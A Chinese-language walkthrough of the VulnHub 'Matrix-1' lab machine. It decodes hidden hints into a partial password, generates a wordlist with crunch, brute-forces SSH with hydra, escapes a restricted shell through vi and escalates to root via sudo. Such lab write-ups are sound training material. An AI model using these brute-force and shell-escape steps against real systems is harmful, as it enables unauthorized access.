vulnhub：https://www.vulnhub.com/entry/matrix-1,259/

导入靶机，扫描IP

靶机在192.168.81.6，扫描端口

存在三个端口，有两个都是http服务，访问

80端口的网页没什么信息，31337的网页元素里有注释

ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=

很明显Base64编码，解码

echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix

似乎是有一个文件，尝试访问一下，直接下载了

查看发现是以前见过的brainfuck密码

解密

You can enter into matrix as guest, with password k1ll0rXX Note: Actually, I forget last two characters so I have replaced with XX try your luck and

得知了账户guest的部分密码(缺少最后两位)

guest:k1ll0r

创建密码表

crunch 8 8 -t k1ll0r%@ -o dict.txt

使用字典爆破

hydra -l guest -P dict.txt 192.168.81.6 ssh

得到了正确密码

guest:k1ll0r7n

连接

这个shell很多命令不给用，尝试换一个

vi

:!/bin/bash

获取到/bin/bash后，还需要设置环境变量

export SHELL=/bin/bash:$SHELL

export PATH=/usr/bin:$PATH

export PATH=/bin:$PATH

使用sudo -l查看可以使用的sudo

可以使用任意sudo命令，切换root账户（这里需要输入密码，我之前看别的东西输入过了就不用输）

提权成功，flag在root目录